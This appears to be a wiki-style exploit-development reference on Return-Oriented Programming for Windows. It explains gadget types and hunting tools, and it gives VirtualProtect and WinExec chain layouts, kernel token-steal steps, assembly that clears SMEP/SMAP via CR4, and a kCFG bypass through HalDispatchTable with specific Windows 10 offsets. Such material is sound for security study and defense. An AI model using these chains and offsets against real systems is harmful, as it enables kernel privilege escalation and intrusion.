Return-Oriented Programming (ROP)

Last updated: 2026-04-11
Related: Mitigations, Primitives, Use After Free, Reversing
Tags: user-mode, kernel-mode, rop, dep-bypass

Summary

ROP (Return-Oriented Programming) is the primary technique for executing controlled computation after DEP/NX prevents traditional shellcode. Instead of injecting new code, ROP chains together short sequences of existing code ending in ret instructions (“gadgets”), redirected via a controlled stack. Modern exploitation on Windows almost universally requires ROP or its variants.

Core Concept

Normal stack:         ROP stack:
[ret addr]            [gadget1 addr]   ← pops to RIP, executes gadget1, hits ret
[locals]              [gadget1 arg]    ← if gadget pops from stack
                      [gadget2 addr]   ← next ret lands here
                      [gadget2 arg]
                      ...
                      [VirtualProtect] ← often used to mark shellcode exec
                      [arg1]
                      [arg2]
                      [arg3]
                      [shellcode addr]
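The layout above can be modelled without any real machine code. The following is a toy sketch, not an exploit: gadgets are ordinary Python functions, the stack is a list, and the loop in run() stands in for ret. Every name in it (regs, run, the gadget functions) is an illustrative assumption.

```python
# Toy model: index 0 of the list is the top of the stack.
regs = {"rax": 0, "rbx": 0}

def pop_rax(stack):          # models `pop rax ; ret`
    regs["rax"] = stack.pop(0)

def pop_rbx(stack):          # models `pop rbx ; ret`
    regs["rbx"] = stack.pop(0)

def add_rax_rbx(stack):      # models `add rax, rbx ; ret`
    regs["rax"] = (regs["rax"] + regs["rbx"]) & 0xFFFFFFFFFFFFFFFF

def run(stack):
    """Each iteration is one `ret`: pop the next gadget and execute it."""
    while stack:
        gadget = stack.pop(0)
        gadget(stack)

chain = [pop_rax, 0x1000, pop_rbx, 0x234, add_rax_rbx]
run(chain)
print(hex(regs["rax"]))      # 0x1234
```

The point of the model is that the data on the stack, not the code, decides what runs next.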

Gadget Types

Essential Gadget Categories

Type	Example	Purpose
Load register	`pop rax ; ret`	Set register to constant
Move register	`mov rax, rbx ; ret`	Copy between registers
Write memory	`mov [rax], rbx ; ret`	Store value
Read memory	`mov rax, [rbx] ; ret`	Load value
Arithmetic	`add rax, rbx ; ret`	Compute addresses
Pivot	`xchg rsp, rax ; ret`	Redirect stack to attacker data
Call	`call rbx ; ret` (or `jmp`)	Invoke function

Stack Pivot Gadgets

Essential when the stack is not controlled but another register points to attacker data:

xchg rsp, rax ; ret        ; RSP = RAX
add rsp, N ; ret           ; skip over stack data to controlled region
mov rsp, [rbx+N] ; ret     ; load stack pointer from memory
leave ; ret                ; mov rsp,rbp; pop rbp — useful for frame-based pivot
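As a rough illustration of what the first pivot does to machine state, the sketch below models xchg rsp, rax ; ret on a dictionary of 8-byte memory slots. The addresses and the helper name are made up for the example.

```python
def xchg_rsp_rax_ret(regs, mem):
    """Model `xchg rsp, rax ; ret` on a dict-backed memory of 8-byte slots."""
    regs = dict(regs)
    regs["rsp"], regs["rax"] = regs["rax"], regs["rsp"]
    regs["rip"] = mem[regs["rsp"]]   # ret: pop the new top of stack into RIP
    regs["rsp"] += 8
    return regs

# Hypothetical layout: 0x7000 is the original stack, 0x9000 is a buffer
# whose contents are attacker-controlled.
mem = {0x9000: 0x1111, 0x9008: 0x2222}
before = {"rsp": 0x7000, "rax": 0x9000, "rip": 0}
after = xchg_rsp_rax_ret(before, mem)
print({name: hex(value) for name, value in after.items()})
```

After the pivot, RIP holds the first value from the controlled buffer and RSP points at the second, so every following ret reads from attacker data.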

Gadget Hunting

Tools

ROPgadget (ROPgadget --binary target.exe --rop)
ropper (ropper -f target.exe)
rp++ (fast, supports PE/ELF/MachO)
mona.py (WinDbg plugin, excellent for exploit dev)
pwntools ROP module (automated chain generation)

Finding Gadgets in Loaded Modules

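# pwntools' ELF/ROP classes only parse ELF files, so PE modules such as
# ntdll.dll need a PE-aware tool. This uses ropper's Python API instead.
from ropper import RopperService

rs = RopperService({'color': False})
rs.addFile('ntdll.dll')            # path to a local copy of the module
rs.loadGadgetsFor()                # analyze every opened file
# x64 Windows passes the first argument in RCX, so look for `pop rcx ; ret`
for path, gadget in rs.search(search='pop rcx; ret'):
    print(path, gadget)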
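Under the hood, gadget finders scan executable bytes for instruction encodings that end in ret (0xC3). The following is a minimal sketch of that idea over a synthetic byte string. The function name, the base address, and the sample bytes are assumptions for illustration, and real tools also disassemble backwards from each ret rather than matching fixed patterns.

```python
def find_byte_gadget(code: bytes, pattern: bytes, base: int = 0):
    """Return base + offset for every occurrence of pattern in code."""
    hits = []
    idx = code.find(pattern)
    while idx != -1:
        hits.append(base + idx)
        idx = code.find(pattern, idx + 1)
    return hits

POP_RAX_RET = bytes([0x58, 0xC3])   # pop rax ; ret
POP_RCX_RET = bytes([0x59, 0xC3])   # pop rcx ; ret

# Synthetic bytes standing in for a module's executable section:
# nop | pop rax; ret | mov rax, rbx | pop rcx; ret | pop rax; ret
blob = bytes([0x90, 0x58, 0xC3, 0x48, 0x89, 0xD8, 0x59, 0xC3, 0x58, 0xC3])

print([hex(a) for a in find_byte_gadget(blob, POP_RAX_RET, base=0x1000)])
print([hex(a) for a in find_byte_gadget(blob, POP_RCX_RET, base=0x1000)])
```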

Key Modules for Windows ROP

ntdll.dll: always loaded, large; its base is randomized once per boot and shared across processes, so a leak from any process is reusable
kernel32.dll: VirtualProtect, VirtualAlloc
kernelbase.dll: wide API surface
msvcrXX.dll: CRT gadgets
ntoskrnl.exe: for kernel ROP chains

Windows-Specific ROP Patterns

VirtualProtect Chain (Classic User-Mode)

Mark shellcode page executable:

[pop rcx ; ret]         RCX = shellcode address
[shellcode_addr]
[pop rdx ; ret]         RDX = size
[0x1000]
[pop r8 ; ret]          R8 = PAGE_EXECUTE_READWRITE (0x40)
[0x40]
[pop r9 ; ret]          R9 = &OldProtect (writable address)
[writable_addr]
[VirtualProtect addr]   call VirtualProtect
[shellcode addr]        after return, jump to shellcode
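The chain above is just a sequence of 64-bit little-endian values. The sketch below shows only the serialization step; every address is a made-up placeholder, and build_chain is a hypothetical helper, not part of any library.

```python
import struct

def build_chain(entries):
    """Pack a list of 64-bit values into consecutive little-endian stack slots."""
    return b"".join(struct.pack("<Q", value) for value in entries)

# Placeholder addresses for illustration only.
POP_RCX, POP_RDX = 0x180001000, 0x180001010
POP_R8, POP_R9 = 0x180001020, 0x180001030
VIRTUAL_PROTECT = 0x180020000
SHELLCODE, WRITABLE = 0x20000000, 0x20001000
PAGE_EXECUTE_READWRITE = 0x40

chain = build_chain([
    POP_RCX, SHELLCODE,               # lpAddress
    POP_RDX, 0x1000,                  # dwSize
    POP_R8, PAGE_EXECUTE_READWRITE,   # flNewProtect
    POP_R9, WRITABLE,                 # lpflOldProtect
    VIRTUAL_PROTECT,
    SHELLCODE,                        # return address after VirtualProtect
])
print(len(chain))                     # 80 bytes: ten 8-byte slots
```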

WinExec / CreateProcess Chain

If shellcode injection is blocked (ACG), call system commands:

[pop rcx ; ret]         RCX = lpCmdLine
[cmd_string_addr]       "cmd.exe /c calc"
[pop rdx ; ret]         RDX = uCmdShow
[1]                     SW_SHOWNORMAL
[WinExec addr]

Kernel ROP (Token Steal)

In kernel space, chains typically:

Set up registers for token steal shellcode logic
Call PsLookupProcessByProcessId equivalent via gadgets
Modify _EPROCESS.Token via memory write gadget
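Return cleanly to the interrupted kernel path, restoring the stack, IRQL, and non-volatile registers; a botched return typically ends in a bug check such as IRQL_GT_ZERO_AT_SYSTEM_SERVICE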

IRETQ Kernel Entry Frame (LSTAR Overwrite / WRMSR Exploit Class)

When LSTAR is overwritten to point at a ROP gadget (or the entry point of a kernel-mode trampoline), the CPU begins executing in ring 0 but with user-mode context: user GS, user RSP, user CR3. To restore full kernel context and continue a ROP chain safely, the standard sequence is:

Gadget 1: swapgs; iretq

swapgs: swaps GS (user TEB) ↔ kernel KPCR — required before any kernel structure access
iretq: performs privileged return — pops RIP, CS, RFLAGS, RSP, SS from the stack in order

IRETQ stack frame layout (must be prepared before syscall):

[ RIP     ]  ← pointer to gadget 2 (top of stack at IRETQ)
[ CS      ]  = 0x10  (kernel code segment)
[ RFLAGS  ]  = current RFLAGS with AC=1 (SMAP disabled), interrupts off
[ RSP     ]  = current RSP (IRETQ pops this into RSP; the subsequent CR4 gadget's `pop rbx` removes it)
[ SS      ]  = 0x18  (kernel stack segment, last/deepest)
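The pop order is easy to get backwards, so here is a small model of it. This is a sketch only: the stack is a Python list with index 0 as the top, the values are placeholders, and the iretq function is a hypothetical stand-in for the instruction.

```python
IRETQ_ORDER = ("rip", "cs", "rflags", "rsp", "ss")

def iretq(stack):
    """Pop the five-qword frame from the top of a list-based stack."""
    frame = dict(zip(IRETQ_ORDER, stack[:5]))
    return frame, stack[5:]

# Placeholder values; 0x10 and 0x18 are the selectors quoted in the layout above.
stack = [0xFFFFF80000001234, 0x10, 0x40002, 0x7FFE0000, 0x18, 0xDEAD]
frame, rest = iretq(stack)
print({name: hex(value) for name, value in frame.items()})
```

Because the frame is consumed top-down, code that builds it with push instructions has to push SS first and RIP last.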

Stack preparation assembly (values are pushed in reverse order, so RIP, pushed last, is on top when iretq executes):

; Prepare RFLAGS with AC set (SMAP checks suppressed) and IF cleared
pushfq
pop rbx
or rbx, 0x40000     ; set AC (bit 18)
btr rbx, 9          ; clear IF (bit 9) without touching AC
push rbx
popfq               ; update live RFLAGS now (ring 3 popfq applies AC, leaves IF unchanged)

; Build the IRETQ frame: SS first (deepest), RIP last (top)
push 0x18           ; SS
push rsp            ; RSP (CR4 gadget's pop rbx will consume this)
push rbx            ; RFLAGS (RBX still holds the value prepared above)
push 0x10           ; CS
push gadget2_addr   ; RIP (top of stack for iretq; placeholder for the real address)
syscall             ; CPU → ring 0, RSP still user-space, jumps to LSTAR → gadget1
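The RFLAGS value for the frame comes down to two bit operations: set AC (bit 18) and clear IF (bit 9). A short worked example, using a sample starting value of 0x246 chosen only for illustration:

```python
RFLAGS_IF = 1 << 9    # interrupt enable flag (0x200)
RFLAGS_AC = 1 << 18   # alignment check flag, doubles as the SMAP override (0x40000)

def frame_rflags(current: int) -> int:
    """Set AC and clear IF, leaving every other bit unchanged."""
    return (current | RFLAGS_AC) & ~RFLAGS_IF

value = frame_rflags(0x246)   # sample input with IF set
print(hex(value))             # 0x40046
```

Note that masking with 0xFF after setting AC would clear bit 18 again, so the mask has to target IF specifically.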

Gadget 2: CR4 manipulation (to disable SMEP and SMAP):

mov cr4, rax        ; RAX = hardcoded CR4 value with bits 20+21 cleared (SMEP/SMAP off)
add rsp, 0x20       ; skip shadow space
pop rbx             ; consume the RSP pushed in IRETQ frame
ret                 ; → shellcode
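The value loaded into RAX is the current CR4 with two bits masked out. A worked example of the arithmetic follows; the sample CR4 value is hypothetical and real values differ per machine, so they should be read from the target rather than hardcoded blindly.

```python
CR4_SMEP = 1 << 20
CR4_SMAP = 1 << 21

def clear_smep_smap(cr4: int) -> int:
    """Return cr4 with the SMEP and SMAP enable bits cleared."""
    return cr4 & ~(CR4_SMEP | CR4_SMAP)

sample_cr4 = 0x350EF8                     # hypothetical value with both bits set
print(hex(clear_smep_smap(sample_cr4)))   # 0x50ef8
```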

Stack alignment: the IRETQ frame should start on a 16-byte boundary. Reserve space with sub rsp, 16 and mask the low four bits of RSP (and rsp, 0FFFFFFFFFFFFFFF0h) before pushing the frame.
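The masking step is plain integer arithmetic. A minimal sketch, with an arbitrary example address:

```python
def align_down(rsp: int, alignment: int = 16) -> int:
    """Round rsp down to the nearest multiple of alignment (a power of two)."""
    return rsp & ~(alignment - 1)

print(hex(align_down(0x7FFE1238)))   # 0x7ffe1230
```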

Return to user-mode (swapgs; sysret): After shellcode payload completes, return to user-mode using a swapgs; sysret gadget:

sysret loads RIP from RCX (must be set to return address in user-mode caller)
sysret loads RFLAGS from R11 (must be set to original user RFLAGS)
sysret does NOT modify RSP — must manually restore RSP to user-mode stack state
swapgs before sysret restores user GS

; In shellcode, before returning:
add rsp, 0x18        ; restore stack past leftover IRETQ frame remnants
pop rcx              ; RCX = return address (return to main())
mov rax, ORIGINAL_CR4 ; restore SMEP
sub rsp, 0x28
push gadget_swapgs_sysret ; CR4 gadget will ret into here
; ... set up CR4 gadget args in rax ...
mov r11, r12         ; r12 = original RFLAGS saved before syscall
ret                  ; → CR4 restore gadget → swapgs; sysret → user-mode

Key: save the original RFLAGS in a callee-saved register (e.g., R12) before executing syscall. R12 survives the ROP chain as long as no gadget clobbers it. Copy it into R11 just before sysret.
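The register contract described above can be captured in a few lines. This is a simplified model that ignores the flag masking and segment reloads the real instruction performs; the register values are placeholders.

```python
def sysret(regs: dict) -> dict:
    """Simplified sysret: RIP <- RCX, RFLAGS <- R11, RSP left untouched."""
    after = dict(regs)
    after["rip"] = regs["rcx"]
    after["rflags"] = regs["r11"]
    return after

regs = {
    "rcx": 0x7FF600001000,   # user-mode return address (placeholder)
    "r11": 0,
    "r12": 0x246,            # original user RFLAGS saved before syscall
    "rsp": 0x1000,
    "rip": 0,
    "rflags": 0x40046,
}
regs["r11"] = regs["r12"]    # mov r11, r12
after = sysret(regs)
print(hex(after["rip"]), hex(after["rflags"]), hex(after["rsp"]))
```

Since RSP passes through unchanged, whatever value it holds at sysret is the stack pointer user mode resumes with.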

Kernel ROP for kCFG Bypass (HalDispatchTable+0x8 Pattern)

Without HVCI, kCFG only checks that the indirect call destination is in kernel address space (top bit set). Overwriting HalDispatchTable+0x8 with a kernel jmp <reg> gadget passes this check while redirecting execution to a user-controlled register:

1. Pre-load shellcode address into a callee-preserved register (R13-R15, RSI)
   via a user-mode assembly stub before the kernel dispatch.
2. Overwrite HalDispatchTable+0x8 (offset 0xc00a68 from ntoskrnl base on Win10 22H2)
   with address of "jmp r13" gadget (rp++ against ntoskrnl.exe: 0x80d5db offset).
3. Call NtQueryIntervalProfile(2, &dummy) — triggers indirect call through HalDispatchTable+0x8.
4. kCFG check: target is kernel address ✓ → jmp r13 executes → control → shellcode.

Key: R13/R14/R15/RSI survive unmodified from NtQueryIntervalProfile entry through to the HaliQuerySystemInformation dispatch point. Verify this per target by setting breakpoints on both functions and comparing register state.
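The check described at the start of this section reduces to testing the top bit of the 64-bit target. The sketch below is a simplified model of that one condition only, with a hypothetical function name and example addresses; it does not reproduce the actual kernel routine.

```python
def passes_kcfg_without_hvci(target: int) -> bool:
    """Simplified model: accept any target whose top (sign) bit is set."""
    return bool((target >> 63) & 1)

print(passes_kcfg_without_hvci(0xFFFFF80012345678))   # True: kernel-half address
print(passes_kcfg_without_hvci(0x00007FF612345678))   # False: user-half address
```

This is why a kernel-resident jmp <reg> gadget passes while a direct pointer to user-mode shellcode does not.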

See Mitigations §kCFG Bypass for full code.

CFG-Aware ROP (Modern Windows)

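CFG validates the targets of indirect calls and jumps (call [reg], jmp [reg]) at compiler-instrumented sites. Returns are not checked, so ret-terminated gadgets still work. However:

At each instrumented site, the compiler inserts a call through __guard_check_icall_fptr, which validates the target before the indirect call runs
Gadgets that route through an instrumented indirect call fail unless the target is a registered valid call target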

CFG-Compliant ROP Strategy

Find gadgets that don’t use indirect calls (only ret, direct call, direct jmp)
Use ret2libc — call imported functions via their address in IAT (these are valid CFG targets as they’re export addresses)
Find “trampoline” gadgets: jmp [rax] where rax points to a valid CFG target
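To make the constraint concrete, here is a deliberately simplified model of a guarded indirect call. Real CFG uses a process-wide bitmap rather than a Python set, and ToyCFG, guarded_call, and the addresses are all invented for this sketch.

```python
class ToyCFG:
    """Simplified stand-in for CFG: a set of addresses marked as valid call targets."""

    def __init__(self, valid_targets):
        self.valid_targets = set(valid_targets)

    def guarded_call(self, functions, target):
        # Instrumented call site: validate first, then dispatch.
        if target not in self.valid_targets:
            raise RuntimeError(f"invalid indirect call target {target:#x}")
        return functions[target]()

functions = {
    0x1000: lambda: "exported function entry",
    0x1007: lambda: "mid-function gadget",
}
cfg = ToyCFG(valid_targets=[0x1000])

print(cfg.guarded_call(functions, 0x1000))
try:
    cfg.guarded_call(functions, 0x1007)
except RuntimeError as err:
    print(err)
```

Function entry points pass the check, while addresses in the middle of a function do not, which is why the strategy above leans on whole functions and ret-terminated gadgets.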

CET Bypass Implications

CET shadow stack invalidates return-address overwrites. Approaches:

JOP (Jump-Oriented Programming): dispatch via jmp instead of ret; no shadow stack interaction for jmp. Requires IBT bypass too if enabled.
ENDBR gadget chains: all gadgets must start with ENDBR64 when IBT is active
longjmp abuse: _longjmp restores RSP, RIP, and the non-volatile registers from jmp_buf, so corrupting jmp_buf gives control of the next execution point
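The reason a plain return-address overwrite stops working can be shown with a toy model. ToyCPU below is an illustrative assumption, not a description of the hardware implementation: it keeps a second, attacker-unreachable copy of each return address and compares the two on ret.

```python
class ToyCPU:
    """Toy model of a shadow stack: call pushes to both stacks, ret compares them."""

    def __init__(self):
        self.stack = []    # normal stack, writable by a memory-corruption bug
        self.shadow = []   # shadow stack, not writable by ordinary stores

    def call(self, return_addr):
        self.stack.append(return_addr)
        self.shadow.append(return_addr)

    def ret(self):
        addr, expected = self.stack.pop(), self.shadow.pop()
        if addr != expected:
            raise RuntimeError("control-protection fault: return address mismatch")
        return addr

cpu = ToyCPU()
cpu.call(0x1000)
print(hex(cpu.ret()))          # 0x1000, the copies match

cpu.call(0x2000)
cpu.stack[-1] = 0x41414141     # simulated overwrite of the saved return address
try:
    cpu.ret()
except RuntimeError as err:
    print(err)
```

Approaches that transfer control with jmp never reach the comparison in ret, which is the gap the list above targets.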

Practical ROP Development Workflow

Identify control point: where do you control RIP? (ret addr, vtable, function pointer)
Determine constraints: which modules are loaded, are they CFG-enabled, is CET active?
Find stack pivot: if RSP doesn’t point to controlled data, find pivot gadget
Build chain manually or with tool: match calling convention (x64 Windows: RCX, RDX, R8, R9, stack)
Handle ASLR: either use fixed-base module or have info leak for dynamic base
Test incrementally: single-step through gadgets in debugger
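For the ASLR step, the arithmetic is: module base = leaked pointer minus that symbol's known RVA, then gadget address = base + gadget RVA. A minimal sketch, with made-up numbers and hypothetical helper names:

```python
def module_base(leaked_ptr: int, symbol_rva: int) -> int:
    """Derive a module base from a leaked pointer to a symbol with a known RVA."""
    base = leaked_ptr - symbol_rva
    if base & 0xFFFF:
        # Windows image bases are 64 KiB aligned, so this signals a wrong
        # symbol or a mismatched module version.
        raise ValueError(f"derived base {base:#x} is not 64 KiB aligned")
    return base

def rebase(base: int, rva: int) -> int:
    """Turn a gadget RVA from a gadget finder into a runtime address."""
    return base + rva

base = module_base(0x7FFB1A2C4F10, 0x14F10)
print(hex(base))                  # 0x7ffb1a2b0000
print(hex(rebase(base, 0x1234)))  # 0x7ffb1a2b1234
```

The alignment check is a cheap sanity test that catches a mismatched module build before the chain is ever run.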

Anti-ROP Techniques to Bypass

Defense	Bypass
CFG	Use ret-only gadgets + valid indirect call targets
CET Shadow Stack	JOP, longjmp corruption
Stack canary	Leak the canary; or avoid the stack overflow and hijack control flow another way (function pointer, vtable)
SafeSEH/SEHOP	Avoid SEH overwrites; not applicable on x64, where exception handling is table-based

Exploit Relevance

ROP is used in essentially every modern Windows exploit that doesn’t rely solely on data-only attacks. It is the backbone technique enabling DEP bypass, and its interaction with CFG/CET defines the complexity of modern exploit chains.

References

“Return-Oriented Programming” — Hovav Shacham (original paper)
“Windows Exploitation in 2019” — various Project Zero posts
mona.py documentation — Corelan Team
“ROP Chains on Windows x64” — Corelan Team
“Bypassing CET with ROP” — Alex Plaskett

gengstah